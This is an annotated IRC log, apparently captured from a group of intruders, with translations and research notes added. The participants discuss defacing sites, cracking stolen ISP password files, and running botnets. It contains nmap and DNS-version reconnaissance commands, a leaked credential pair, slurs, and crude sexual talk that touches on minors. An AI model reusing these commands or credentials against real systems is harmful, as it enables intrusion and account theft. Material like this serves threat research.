      :HPUX :EnergyMech 2.7.6u1
      :D1ck :lol
      :D1ck :man
      :D1ck :u ever owned nxt?
      :Sp07 :thats not that new I think
      :D1ck :err bind
      :D1ck :?
      :Sp07 :nope
      :D1ck :?
      :D1ck :coz like
      :D1ck :?
      :Sp07 :you asked me that yesterdya
      :D1ck :oh
      :D1ck :oh
      :D1ck :no i dint
      :Sp07 :yes you did
      :Sp07 :
      :Sp07 :@@@@@@@
      :Sp07 :#########
      :Sp07 :$$$$$$$$
      :Sp07 :%
      :D1ck :OH
      :D1ck :well
      :D1ck :NO
      :D1ck :I DINT@
      :Sp07 :$$$$$$$$$$
      :Sp07 :##########
      :Sp07 :YYYYYYYYY
      :Sp07 :EEEEEEE
      :Sp07 :SSSSSSSS
      :Sp07 : DSFFFFF
      :D1ck :man
      :D1ck :my freind is 16 
      :D1ck :and she is a mother
      :D1ck ::()
      :Sp07 :so?
      :D1ck :15
      :Sp07 :hehe
      :D1ck :15
      :Sp07 :at my school there are lots of pregnant girls there
      :Sp07 :I go to continuation high school
      :D1ck :heh
      :D1ck :HAHAHAHAHHAAH
      :Sp07 :babies there
      :Sp07 :lots
      :Sp07 :hehe
      :Sp07 :like 1/4 of the girls are either pregnant or have babies
      :D1ck :LOL
      :Sp07 :my school has like 100 studenst in it
      :D1ck :HAHAHAHAHA
      :D1ck :kewl
      :D1ck :babies?
      :D1ck :they dont abort?
      :D1ck :abortion = brutal
      :Sp07 :nope
      :D1ck :kewl
      :D1ck :u saw a 13 year old pregnent girl ever?
      :Sp07 :nope
      :D1ck :k
      :Sp07 :yo yo yo yoyo yooyyoyoyoyoyoyyoyoyoyoyoooooooooooyyyyyyyooooooooyyooooyoyoyoyyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyoyo
      :Sp07 :you should start eggdrop net
      :Sp07 :instead of mechs
      :Sp07 :eggdrops are better
      :D1ck :well
      :Sp07 :yOOYOYYOoyoOYOYOYOyOYOOYOYoyyoyoyoYOOyoYOyoOYOYOYOYOyooyOYOyoYoYO
      :Sp07 :WASupSUPUpsUWpASUPWUSpwuAPSUpsu
      :D1ck :may eb
      :Sp07 :maybe?
      :Sp07 :dick
      :Sp07 :ass
      :Sp07 :fuck
      :Sp07 :vbbbbbbbbbbujh
      :Sp07 :uk
      :Sp07 :I AM BORED AS FUCK
      :Sp07 :FUCK FUCK FUCK
      :Sp07 :IS IT 12:00 IN PAKISTAN?
      :Sp07 :03.............................................2111111111111111111564987654144444444++++++++++-*****///////-*/81*0.-+*/801
      :Sp07 :+950+950974**-77055555121654
      :D1ck :yep
      :D1ck :exactly 12
      :D1ck :night
      :Sp07 :seeeee
      :D1ck ::P
      :Sp07 :how
      :Sp07 :smart
      :Sp07 :I
      :Sp07 :am
      :Sp07 :time to play some starcraft
      :Sp07 :afk
      :D1ck :haha
      :D1ck :k
      :Sp07 :while im playing
      :Sp07 :starcraft
      :Sp07 :I
      :Sp07 :want you to
      :Sp07 :change all your 
      :Sp07 :mechs
      :Sp07 :to eggdrops
      :Sp07 :ok
      :Sp07 :?
      :Sp07 :?
      :D1ck :well
      :Sp07 :your too lazy too
      :Sp07 :
      :D1ck :i`ll think about it.
      :Sp07 :haheha
      :Sp07 :ill give you tcls to use
      :D1ck :;P
      :D1ck :k
      :Sp07 :29-2-2
      :Sp07 :thats my score
      :Sp07 :5-2-2
      :Sp07 :is my ladder score
      :Sp07 :tahts how good I am
      :D1ck :k
      :J4n3 :chayeen chapa chayeen chapa kay chayeen, paaniyon main cheentay uraathee huwee larkee
      :J4n3 :dekheeeeee hai humnain aathi huwee lehron say jaathi huwee larkeeee
      :D1ck :ins
      :D1ck :J4n3 
      :D1ck :i`m trying to own example.com
      :D1ck :and bollywodpages
      :J4n3 :thats kewl D1ck
      :J4n3 :defacing will be popular :p
      :Sp07 :go hack me a bounce d1ck
      :Sp07 :fast 1
      :m4ry :w3rd
      :m4ry :what happened to the other bots?
      :J4n3 :m4ry sup ?
      :J4n3 :bots glined i think
      :D1ck :HEH
      :m4ry :hey J4n3
      :D1ck :HEATAZ
      :m4ry :again? ;)
      :D1ck :8.2
      :D1ck :?
      :J4n3 :heh
      :m4ry :SN1P3R
      :D1ck ::)
      :D1ck :SUp
      :D1ck :?
      :m4ry :8.2?
      :m4ry :scan wol already
      :D1ck :yeah
      :m4ry :i'm stuck here with my roots going up/down
      :m4ry :24/7
      :D1ck :no
      :D1ck :tell me
      :m4ry :can't tell if it's my end that's down or theirs
      :m4ry :./nmap -sP -PI wol.net.pk/24
      :m4ry ::)
      :D1ck :hahahaha
      :D1ck :ROFL
      :D1ck :m4ry
      :D1ck :tell me
      :D1ck :?
      :D1ck :when i query
      :D1ck :it goes through
      :D1ck :and dont sow on my NS 
      :D1ck :dig @www.example.com dick.snip.example.net a
      :D1ck :i tried
      :D1ck :IN NXT
      :m4ry :dig IN A @blah www.haha.heatz.snip.example.net
      :D1ck :??????
      :m4ry :or
      :m4ry :dig IN NXT @blah www.haha.heatz.snip.example.net
      :m4ry :same thing
      :m4ry :make subdomains of subdomains
      :m4ry :and keep making different ones
      :m4ry :cos sometimes the DNS records get cached
      :D1ck :www?
      :D1ck :subdomain is snip.example.net
      :D1ck :subdomain is snip.example.net
      :D1ck :oh
      :D1ck :i do
      :m4ry :ur authorative over sovg.net?
      :m4ry :or whatever
      :m4ry :WOL is l33t
      :m4ry :they run BSDI
      :m4ry :most others here run NT
      :m4ry :[root@localhost /root]# dig @radius.wol.net.pk version.bind chaos txt  
      :m4ry :VERSION.BIND.           0S CHAOS TXT    "4.9.7-REL"  
      :m4ry :LOL
      :D1ck :yep
      :D1ck :socg
      :D1ck :man
      :D1ck :U GOT LINUX
      :D1ck :?
      :D1ck :U GOT LINUX?????????
      :D1ck :U GOT LINUX?????????
      :D1ck :U GOT LINUX?????????
      :m4ry :ur lagging
      :m4ry :are u mad
      :D1ck :HEATAZ
      :D1ck :U I KHI?
      :m4ry :i'm sitting in this shithole of a city
      :D1ck :and u got LINUX
      :D1ck :HAW
      :m4ry :with no healthy computer for miles
      :D1ck :?
      :D1ck :?
      :D1ck :hahahaha
      :D1ck :well
      :D1ck :nxt is starting to suck
      :D1ck ::)
      :m4ry :i'm getting some flak here
      :m4ry :nxt?
      :m4ry :why?
      :m4ry :works 99% of the time for me :)
      :m4ry :SCAN WOL
      :m4ry :CLASS B
      :m4ry :WOL.NET.PK
      :m4ry :FOR NAMED & BSD SHIT
      :m4ry :i'm out
      :m4ry :my cuz is out of hours (again)
      :m4ry :i am indeed, cut-off
      :m4ry :LOL
      :D1ck :heh
      :D1ck :no bots?
      :D1ck ::(
      :D1ck :'flak'?
      :D1ck :heh
      :D1ck :i cant own www.example.com
      :D1ck :haha this freind's quit message
      :D1ck :rofl
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck :J4n3 
      :D1ck :mera babies
      :Sp07 :my script is elite now
      :Sp07 :hahaah
      :D1ck :hahaha
      :Sp07 :after I get like 10 more bots
      :Sp07 :and like
      :D1ck :i am a cool member of diz-crew
      :D1ck :HAHAHA
      :Sp07 :finish the script
      :D1ck :founded by h4r33
      :D1ck :./ == welcome
      :Sp07 :Co0l
      :Sp07 :./
      :D1ck ::)
      :Sp07 :./
      :Sp07 :./
      :D1ck :HHEH
      :Sp07 :./Sn1p3R
      :D1ck :./HEH h4r33
      :Sp07 :./DiSeasE
      :D1ck :rofl
      :D1ck :;)
      :Sp07 :./SpITz
      :Sp07 :./PhAT6
      :D1ck :anyway
      :D1ck :~
      :D1ck :
      :D1ck :
      :D1ck :SHUTUP
      :D1ck :heh
      :Sp07 :oK
      :D1ck :
      :D1ck :_
      :Sp07 :_
      :J4n3 :(_|_)
      :Sp07 :0 \/\/4
      :J4n3 :(*Y*)
      :D1ck :heh
      :D1ck :WHO WILL SEXOR ME
      :D1ck :?
      :Sp07 :my dog will
      :J4n3 :8==D
      :J4n3 :lol
      :D1ck :dude
      :Sp07 :doggy style
      :D1ck :i dont like dogs
      :D1ck ::(
      :Sp07 :ok
      :D1ck :EVERY ONE TYPE control + a
      :D1ck :EVERY ONE TYPE control + S
      :D1ck :EVERY ONE TYPE control + S
      :D1ck :in linux
      :D1ck ::)
      :D1ck :PHAT6
      :D1ck :Tota1KaaS
      :J4n3 :i'm on w1nbl0w5
      :Sp07 :PHAT6
      :D1ck :inetd-s
      :D1ck :inetd-s
      :D1ck :anker
      :D1ck :CyneX
      :D1ck :w00p
      :Sp07 :metoo
      :Sp07 : control + a
      :Sp07 : control + S
      :Sp07 : control + S
      :Sp07 :control ass
      :D1ck ::)
      :D1ck :hi
      :D1ck :J4n3: i`m trying www.example.com and www.example.com
      :J4n3 :any luck so far ?
      :D1ck :but cant own it
      :D1ck :ACTION wonders
      :D1ck :i`m trying.
      :D1ck :nopes
      :D1ck :well
      :J4n3 :hmm
      :D1ck :J4n3 
      :D1ck : /dcc send d1ck cracked.example.txt
      :D1ck ::P
      :J4n3 :hahah kesc walay karnay dain tho na
      :J4n3 :waiasy oye ye waqayee example kee file hai ?
      :Sp07 :uhh you like sending things to yourself?
      :Sp07 :hehe
      :D1ck :ofcourse
      :D1ck :<J4n3> waiasy oye ye waqayee example kee file hai ?
      :D1ck :?
      :Sp07 :waiasy oye ye waqayee example kee file hai
      :D1ck :kyoon nahin ?
      :D1ck :example ki file ai
      :D1ck :HAHAHAHHA
      :D1ck :Sp07: shutup, were speaking urdu
      :J4n3 :ek niklaa thaa,   user : nycop   pass : 1955
      :D1ck :heh
      :J4n3 :chala nahin
      :Sp07 :kesc ye karnay kee tho waqayee
      :D1ck :k
      :J4n3 :lol
      :D1ck :;P
      :J4n3 :Sp07 speakin urdu wow
      :Sp07 :yup
      :Sp07 :chala
      :D1ck :hahah
      :D1ck :LOL
      :D1ck :Sp07  madr chode 
      :D1ck :chootiyay
      :D1ck :randi kay ...
      :Sp07 :you
      :Sp07 :kay chootiyay madr
      :D1ck ::P
      :D1ck :?
      :D1ck :HAHAHAHAH
      :J4n3 :hahahha
      :J4n3 :barwa dalla
      :D1ck :lol
      :Sp07 :SI SI
      :D1ck ::)
      :Sp07 :MUY BIEN
      :D1ck :ACTION fingers Sp07 wet pussy
      :Sp07 :oh yeah
      :Sp07 :ACTION fingers d1ck dry pussy
      :D1ck :jane sun .in ko sadmind and ttdb kar
      :D1ck :deface
      :Sp07 :deface my dick
      :D1ck :dude
      :D1ck :i would
      :D1ck :but
      :D1ck :problem 
      :D1ck :is
      :Sp07 :I know I know
      :Sp07 :too small
      :Sp07 :FUK U
      :D1ck :that
      :D1ck :u
      :D1ck :dont
      :D1ck :have
      :D1ck :1
      :D1ck ::(
      :Sp07 :ACTION pulls of dick
      :Sp07 :ACTION shoves dick in d1cks face
      :Sp07 :ACTION puts dick back on
      :D1ck :haha
      :D1ck :OH
      :D1ck :NOW THATS FLEXIBLE
      :D1ck :J4n3 
      :D1ck :he thinks i am a fed
      :D1ck :fbi
      :Sp07 :fBi
      :D1ck :fBi.gOV
      :Sp07 :uhh
      :Sp07 :thats my server
      :Sp07 :fBi.GoV
      :Sp07 :DiSeAsE.fBi.GoV
      :D1ck :LAILA
      :D1ck :P00P
      :D1ck :J4n3 
      :Sp07 :you guys live near each other?
      :D1ck :yep
      :D1ck :he's my anal partner
      :D1ck :
      :D1ck ::)
      :D1ck :and some times we do 3some
      :D1ck :heh
      :Sp07 :he
      :Sp07 :heh
      :Sp07 :POLICE OUTSIDE MY HOUSE
      :Sp07 :let me go get my gun
      :Sp07 :jk hehehe
      :Sp07 :did you deface onghome.com
      :D1ck :no
      :Sp07 :deface yahoo.com
      :D1ck :its not my box
      :D1ck :J4n3 
      :Sp07 :and people will respecty ou
      :Sp07 :hehe
      :D1ck :J4n3 s
      :D1ck :heh
      :D1ck :i mostly do indian sites
      :Sp07 :www.india.com
      :Sp07 :orsomethign
      :Sp07 :ehe
      :Sp07 :somethinf famous
      :Sp07 :like whitehouse.gov
      :nohup :hey look at my ip
      :nohup :i am a kewl bot
      :nohup :should i deface this?
      :Sp07 :no
      :Sp07 :yeah
      :Sp07 :you should deface it then delete everything
      :Sp07 :and when they get it back up
      :Sp07 :hack it again
      :D1ck :i patched it
      :D1ck :but i will depatch it
      :D1ck :J4n3 
      :D1ck :where are u when i need u
      :D1ck :where are u when i need u
      :D1ck :where are u when i need u
      :Sp07 :with another man
      :D1ck :lol
      :D1ck :J4n3 
      :D1ck : /wi nohup 
      :D1ck :fuck
      :D1ck :where are u
      :D1ck :d4v3
      :J4n3 :D1ck
      :J4n3 :here
      :D1ck :i am defacing mail.example.com
      :D1ck :k?
      :D1ck :K
      :D1ck :?
      :D1ck :?
      :D1ck :?
      :J4n3 :hmm
      :D1ck :?
      :J4n3 :now ?
      :J4n3 :u mean defacing now ?
      :D1ck :yep?
      :D1ck :we can deface and fix the index after attrtion mirrors
      :D1ck :and when they will email i`ll deleted their mail from rdm database
      :J4n3 :oh
      :J4n3 :okay 
      :D1ck :?
      :D1ck :wana do it?
      :J4n3 :actually main sonay ja raha tha, kal na karlain ???
      :D1ck :ok
      :D1ck ::(
      :D1ck :hehe
      :J4n3 :agar if u want now, then ok
      :D1ck :kal kar lain gay
      :J4n3 :main bet jaatha hon :)
      :D1ck :cya
      :J4n3 :?
      :D1ck :;)
      :D1ck :take care
      :J4n3 :heh okies thanx
      :J4n3 :theri bhabi ut gayee hai cheekh rahi hai mujh par
      :J4n3 :ab sojao
      :J4n3 :and i'm feelin horny too :P
      :J4n3 :errrrr
      :J4n3 :see ya
      :J4n3 :g0ne
      :D1ck ::P
      :J4n3 ::)
      :D1ck :hehehe
      :D1ck :cya
      :D1ck ::)
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :Sp07 :yo d1ck
      :D1ck :?
      :D1ck :brb
      :D1ck :trojaning boxens
      :D1ck :heh
      :Sp07 :send me some sun5.7 exploits
      :Sp07 :local
      :Sp07 :just wanna root this box and thats all
      :Sp07 :hehe
      :D1ck :i dont have it
      :Sp07 :uhhhh
      :Sp07 :you dont have any?
      :D1ck :brb
      :D1ck :nope
      :D1ck :ACTION is away: (bbiab) [BX-MsgLog On]
      :Sp07 :scala% id
      :Sp07 :uid=502(kasidit) gid=10(staff) 
      :Sp07 :uhh you suck
      :Sp07 :nohup?
      :D1ck :back
      :D1ck :.add D1ck * D1ck 100 1 4
      :D1ck :.save
      :Sp07 :.add Sp07 too
      :Sp07 :=D
      :D1ck :okie
      :Sp07 :.add Sp07 * Sp07 100 1 4
      :D1ck :.add Sp07 #k1dd13 Sp07 70 1 4
      :Sp07 :hwhwhw
      :D1ck :heh
      :D1ck :.save
      :Sp07 :.up
      :Sp07 :.up
      :D1ck :____p____ nick in-gov
      :Sp07 :woho
      :D1ck :___up____ nick nutsack
      :D1ck :nohup3309 nick domestic
      :D1ck :nohup6607 nick hostile
      :D1ck :nohup6607 nick peniswise
      :Sp07 :nohup6607 nick blowjob
      :Sp07 :hehe
      :D1ck :nohup6607 nick blowjob
      :D1ck :nohup8585 nick blowjob
      :Sp07 :theres no passwords?
      :D1ck :nohup7911 nick graz
      :D1ck :graz nick graz-at-
      :D1ck :nohup_ nick dig-ns
      :Sp07 :nohup___ nick nutsac
      :D1ck :nohup____ nick [shit]
      :D1ck :_ohup____  sexfig
      :D1ck :.add D1ck * D1ck 100 1 4
      :D1ck :.save
      :Sp07 :nohup__ nick slut
      :Sp07 :nohup__ nick ms-whore
      :D1ck :nohup__ nick slut
      :D1ck :nohup__ nick ms-whore
      :D1ck :.q
      :D1ck :_ohup____ nick crackX
      :D1ck :%_ohup____ nick whoami
      :D1ck :__hup____ nick uname-a
      :D1ck :nohup_ nick nig
      :D1ck :nohup__ nig die
      :D1ck :nohup___ nick ms-sin
      :D1ck :nohup__ nick hornkiten
      :D1ck :nohup8815 nick identd
      :D1ck :.save
      :D1ck :.add D1ck * D1ck 100 1 4
      :D1ck :.save
      :D1ck :jej
      :D1ck :nohup userlist
      :D1ck :fuck
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :Sp07 :autoop?
      :D1ck :yeo
      :Sp07 :.say hi
      :D1ck :yep
      :Sp07 :.help
      PRIVMSG Sp07 :DCC CHAT CHAT 2886730091 32847
      :Sp07 :damn thats a lot of bots
      :D1ck :dos_ nick ARGV1
      :D1ck :i have 70+
      :D1ck :glined
      :D1ck :and 42+ down
      :D1ck ::?(
      :D1ck : t mail.examplea.com 1080
      :D1ck :Trying 192.168.103.131...
      :D1ck :Connected to mail.example.com.
      :D1ck :Escape character is '^]'.
      :D1ck :HAHAHAAHA
      :D1ck :dziasta uses wingate
      :D1ck :now
      :D1ck :LOL
      :Sp07 :?
      :Sp07 :heh
      :D1ck :rofl
      :D1ck :err VeNoMouS 
      :D1ck :is
      :D1ck :a
      :D1ck :u33r
      :D1ck :qu33r
      
      =-=
      
      Day 11 June 14
      
      :J4n3! :D1ck
      :J4n3! :moi back :p
      :D1ck! :yo
      :D1ck! :i owned mar1s
      :D1ck! :the real server
      :D1ck! :and uploaded their radius log
      :D1ck! :bur
      :J4n3! :mar1s ?
      :D1ck! :but they are encrypted unlike satnet
      :D1ck! ::(
      :D1ck! :mars.example.net
      :J4n3! :ohhh
      :D1ck! :give me a ip
      :J4n3! :then ? what's the result ?
      :D1ck! :i`ll tell the user name
      :D1ck! ::)
      :J4n3! :wait
      :D1ck! :k
      :J4n3! :hehe no example users online
      :D1ck! :lol
      :J4n3! :yaar example kay password jo nikal rahay hain /etc/passwd wo chal nahi rahay :/
      
      dude whatever passwords coming out from example /etc/passwd those arent working
      
      :D1ck! :;P
      :D1ck! :wana deface mail.example.com
      
      [Saumil's note: example is a standard Indian greeting... example.com is an Indian site that
      delivers Indian gifts to the US]
      
      :D1ck! :or we should wait?
      :D1ck! :kewl
      :D1ck! ::)
      :D1ck! :oye
      :D1ck! :i have example ka personal date in MY COMPUTER
      
      I have example's personal data (i think date might be a type) in MY COMPUTER
      
      :D1ck! :over 50 MB
      :D1ck! :AHAHAHAHAH
      :D1ck! :all khawar nehal's work
      :D1ck! :inmy pc
      :D1ck! :LOL
      :J4n3! :haha tight
      :J4n3! :oye deface kardo
      
      yo let's deface (them)
      
      :D1ck! :he's 'OK'
      :D1ck! :oki
      :J4n3! :lekin yaar ye pass kyon nahi chal rahay :?
      
      but dude why arent these pass(words) working?
      
      :D1ck! :?
      :J4n3! :the pass from that shadow file :
      :D1ck! :dunno jani
      
      dont know pal
      
      :J4n3! :they r fresh they should work naa
      :D1ck! :;P
      :D1ck! :?
      :D1ck! :oye brb rebooting to win
      :D1ck! :brb
      :J4n3! :kkz
      :atlanta.ga.us.undernet.org 005 pencil SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server
      :D1ck! :J4n3 
      :D1ck! :there?
      :D1ck! :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :J4n3! :D1ck
      :J4n3! :D1ck
      :J4n3! :lets deface
      :J4n3! :wow
      :J4n3! :mera jooota hai japani , ye pathloon englistaani , sir pay laaal topi rooosi phir bee dil hai balochistani :p
      
      [Note: lines from a popular hindi movie song, except at the end he
      says my heart is Baluchistani. Baluchistan is a province in Pakistan.]
      
      :J4n3! :chunari chunari
      
      chunari = veil
      
      :J4n3! :.up
      :netro! :3 days 14:51:23time
      :PHAT! :4 days 13:45:02time
      :J4n3! :D1ck
      :D1ck! :J4n3 
      :D1ck! :yaar my mousr ka slot is not working
      
      dude my mouse slot isnt working
      
      :D1ck! :i am mouseless
      :D1ck! ::(
      :J4n3! :lol
      :J4n3! :how ?
      :J4n3! :port kharab hai ?
      
      is the port malfunctioning?
      
      :D1ck! :yep
      :D1ck! :port
      :D1ck! :ps/2
      :D1ck! :ttys0 is modem
      :D1ck! :mouse ka hai magr modem work karta he
      
      the mouse's (port) is there but the modem is working as well
      
      :D1ck! :KHAWAR NEHAL IS GAY
      
      [note from Saumil: Khawar Nehal is a guy's name, and a quick Google search
      on him turned this up in one of the pages:
      
      Subject: Research on ISP ?
      From: Khawar Nehal <knehal@bigfoot.com>
      Date: Sat, 13 Nov 1999 13:35:12 +0500 (PKT)
      X-Message-Number: 4
      
      What would you like to know ?
      
      ISP as in Internet SERVICE Provider is an extremely large number of
      SERVICES from trying to replacing broken coffeecup holders for customers
      sitting in the 'dark' to setting up creating your own gateways=20
      and routers so that your network stays up under DOS attacks.
      
      Thank You.
      
      
      --end of note]
      
      :D1ck! :I OWN HIM
      :D1ck! :HAHAHAHAHAHAA
      :D1ck! :HGOT 0 SECURITY SKILL1
      :J4n3! :hahahah yeah
      :J4n3! :in security he is Zero
      :J4n3! :i told u before
      :D1ck! :yeo
      :D1ck! :://
      :J4n3! :u owned example again ?
      :D1ck! :well
      :D1ck! :i lost ns1 and mail
      :D1ck! :but i owned mars
      :D1ck! :but i dunno if i still have
      :J4n3! :He He
      :J4n3! :yaar i have 800 + password of paknet, but not of karachi, 
      :J4n3! :and they aren't working here :(
      :D1ck! :they close 21 22 23 513
      :D1ck! ::(
      :D1ck! :reb.tar.gz == MASS win9.x reboot
      :D1ck! :by D1ck
      :D1ck! :oh
      :D1ck! :kewl
      :D1ck! :send me the file
      :D1ck! :hehe
      :J4n3! :3 different files  1 of quetta, pishwar and gujrawala,    right now cracking fasialbad
      
      [note from Saumil: quetta, peshawar, gujrawala and faisalabad are cities/provinces
      in Pakistan; so is multan]
      
      :J4n3! :multan is baqi hia
      
      multan is still pending
      
      :J4n3! :bejon ?
      
      should i send?
      
      :D1ck! :?
      :D1ck! :yp
      :D1ck! :yep
      :D1ck! :bhej
      
      send
      
      :D1ck! :
      :D1ck! ::P
      :J4n3! :wait
      :D1ck! :okies
      :D1ck! :dokies
      :D1ck! :oye where are j0e's botS?
      :J4n3! :uska server band huwa hia kisi nay koi abuse ya dos attack kiya tha
      
      his server is down now. someone had done an abuse or a DoS attack on him
      
      :D1ck! :shit
      :D1ck! :finished?
      :J4n3! :yup
      :J4n3! :3 files hain ye baaqi 2 baqi hain
      
      there are 3 files and the other 2 are remaining
      
      :D1ck! :abey
      
      hey
      
      :D1ck! :oh
      :D1ck! :<bacha> mujhay aap say milna hai
      
      <kid boy> i would like to meet you
      
      :D1ck! :<hritk> to have a c0ke
      
      [note from saumil: dont know what this hritk is]
      
      :J4n3! :<bachi> mujay aap say mil kar sex karna hai
      
      <kid girl> I would like to meet you and have sex with you
      
      :D1ck! :<bacha> hrtik
      :D1ck! :hahahaha
      :D1ck! :<htrik> find me with c0ke
      :D1ck! :what stupid add
      :D1ck! :haha
      :J4n3! :heh
      :J4n3! :oye send me that bnc file of phycoid
      :J4n3! :phsycoid
      :D1ck! :?
      :D1ck! :oki
      :D1ck! :wait
      :J4n3! :k
      :J4n3! ::)
      :D1ck! :dont distro
      :J4n3! :hehe nope
      :D1ck! :errrrrr
      :D1ck! :too many ping timeouts
      :J4n3! :yeah
      :D1ck! :WONDER jump austin.tx.us.undernet.org
      :D1ck! :quit
      :J4n3! :fuck
      :m4ry! :.say hi
      :m4ry! ::/
      :m4ry! :jupe?
      :m4ry! :ur guys are juping DEAThaces?
      :Sp07! :.up
      :Sp07! :.up
      :m4ry! :hey dis
      :Sp07! :hy
      :Sp07! :hey
      :D1ck! :sup
      :D1ck! :J4n3 
      :atlanta.ga.us.undernet.org 005 pencil SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server
      :atlanta.ga.us.undernet.org 005 pencil SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server
      :D1ck! :J4n3 
      :J4n3! :D1ck
      :D1ck! :sup?
      :D1ck! :i have to go today :(
      :D1ck! :for mouse
      :J4n3! :nuff much just cracked fsd paknet, 691 paases lol
      :J4n3! :oh
      :J4n3! :yeah mouse is important
      :D1ck! :kewl
      :D1ck! : /dcc send d1ck cracked.txt
      :D1ck! :heh
      :J4n3! :heeh wiat
      :D1ck! :ki
      :D1ck! :hehe 
      :D1ck! :coool
      :D1ck! :man crack zoooooooooooooom
      :D1ck! :man crack zoooooooooooooom
      :J4n3! ::p
      :D1ck! :;p
      :D1ck! :where woul those passwords work?
      :J4n3! :yaar uskay pass kaam he nahi kar rahay plus abee lagatha hon phir say usko, deko agar listh na jayen tho kal tho hojayega
      
      dude his passwords are not working at all. seems like let's check him out again, see if the list doesnt go through then it will be done by tomorrow
      
      :D1ck! :woul=would.
      :D1ck! :oh okin
      :D1ck! ::P
      :J4n3! :yaar ye samaj main nahi aaraha, in their website they says its romaing in paknet
      
      dude i cant understand this - in their website it says it is roaming in Paknet
      
      :D1ck! :roaming/.
      :D1ck! :?
      :J4n3! :roaming yeah, like u use account all over in pakistan like comsats
      :D1ck! :oh
      :D1ck! :do u put username@khi?
      :D1ck! :in comsats
      :D1ck! :u do that
      :J4n3! :nope try kiya
      :J4n3! :nahin horaha 
      
      doesnt happen
      
      :J4n3! ::/
      :D1ck! :oh
      :D1ck! ::/
      :J4n3! :i tried of quetta only 
      :J4n3! :ther aren't workin
      :D1ck! :oki
      :D1ck! :call them and ask
      :J4n3! :yeah i told Rsnake to call them and ask
      :D1ck! :'Hi main quetta say hooon
      :D1ck! :'Hi main quetta say hooon
      
      Hi I am from Quetta. You sister-fucker, I cant connect
      Hi I am from Quetta. You sister-fucker, I cant connect
      
      :D1ck! :oh
      :J4n3! :LOOL
      :D1ck! :hehe
      :J4n3! :haha dekho aaj pooctha hon us say, agar usnay nahi kiya call tho main karkay poochonga
      
      haha see today i will ask him, if he doesnt call, then i will do it and ask him again
      
      :D1ck! :oye is rsnake online?
      :D1ck! :oki
      :J4n3! :nahin not now
      
      nahin = no
      
      :D1ck! :oh
      :J4n3! :yaar that psyBNC is cooooooooooooooooool
      :J4n3! :tight tight
      :D1ck! :u know what modem he has?
      :J4n3! :it rox
      :D1ck! :for linux?
      :D1ck! :hehe 
      :D1ck! :psyBNC
      :D1ck! :r0x
      :J4n3! :hmm he told me , its not zoltrix kuch ajeeb saa naam ahi
      
      hmm he told me, it is not zoltrix. some really weird name
      
      :D1ck! :ok
      :D1ck! :MINE SUCKS
      :D1ck! :$#%#$%#&^%$#
      :D1ck! :d4v3
      :D1ck! :i want to register www.k1dd13-online.org
      :D1ck! :hmmm
      :J4n3! :hmm
      :J4n3! :registeration dotster.com
      :D1ck! :gimme some GOOD server
      :J4n3! :cooool
      :J4n3! :bu
      :J4n3! :but
      :D1ck! :?
      :J4n3! :i think register plus host to somewhere
      :D1ck! :yea
      :D1ck! :tell me some good server, that wuld host it?
      :J4n3! :there r many good servers but question is  , i doubt if they host hacking site or not
      :D1ck! :oh
      :D1ck! :shit 
      :D1ck! :i lost 
      :D1ck! :mars
      :J4n3! :yeah thats the problem
      :J4n3! :shit
      :D1ck! :;p
      :D1ck! :but i knew i would
      :J4n3! :lol 
      :J4n3! :how ?
      :D1ck! :HAHHHAHAAHAA
      :D1ck! :they reinstalled linux
      :D1ck! :its still vulneable
      :D1ck! :LOL
      :D1ck! :HAHAHAHAHAHAHAHAHAH
      :D1ck! :they reinstalled all 3 boxes
      :D1ck! :ROFL
      :J4n3! :lol
      :D1ck! :;p
      :D1ck! :i`ll hack all again'
      :J4n3! :u mean still vulnerable by ? bind ?
      :D1ck! :eYe OwN KHaWaR NeHaL
      :D1ck! :my brother sed 'nehal is a very proud person and he sucks'
      :D1ck! :yeah
      :J4n3! :yaar waiasy banda proudy nahin hai, kush ikhlaaq banda hai
      
      dude that way the guy isnt a proudy (slang: stuck up) chap ....seems to be a down to earth chap
      
      :J4n3! :example ka naveed admin hai , wo bara proudy hai he sux
      
      example's admin is naveed. he's really proudy - he sucks
      
      :D1ck! :yaar
      :D1ck! :<Knehal> weell i u dont take my coure u can never suceeeed in ISP bussiness
      
      [Note: seems this k. nehal guy seems to be teaching courses on how to set up ISPs]
      
      :D1ck! :<brother> fuck off
      :J4n3! :lol
      :D1ck! :hehe
      :J4n3! :humsay tho bauth acha raha hai , meri us say dosthi be hogayee thee kaafi
      
      he's been good to us. i developed a good friendship with him too
      
      :D1ck! :<Knehal> i made all isps successful
      :J4n3! :ek do marthaba ghar bee drop kiya tha usay
      
      a couple of times i had even visited his house
      
      :D1ck! :kewl
      :D1ck! :how much money did he take?
      :D1ck! :700 or 7000
      :D1ck! :?
      :D1ck! :for modewl 1
      :J4n3! :dunno how much personally but i think less then 5000
      :D1ck! :oh
      :D1ck! :tell him to school us
      :D1ck! :hehe
      :J4n3! :karlega, wait
      
      will have it done, wait
      
      :J4n3! :i got one of his email about his courses, shall i forward it to u ?
      :D1ck! :yaar its so far for me :/
      :D1ck! :yep
      :D1ck! :forward
      :D1ck! :cr15@hotmail.com and dynamic@example.org (yUCK_
      :D1ck! :)
      :D1ck! ::)
      :J4n3! :wait
      :D1ck! :ok
      :J4n3! :Course outline :
      :J4n3! :Introduction
      :J4n3! :History
      :J4n3! :X windows Setup
      :J4n3! :Dialup Networking
      :J4n3! :Ethernet Networking
      :J4n3! :TCP/IP
      :J4n3! :SMB
      :J4n3! :Sendmail Mail server
      :J4n3! :Apache Web Server
      :J4n3! :Applixware
      :J4n3! :DNS Server
      :J4n3! :NFS
      :J4n3! :Sound Card Configuration
      :D1ck! :errrrr
      :D1ck! :i know all that.
      :D1ck! :is that it?
      :D1ck! :heh
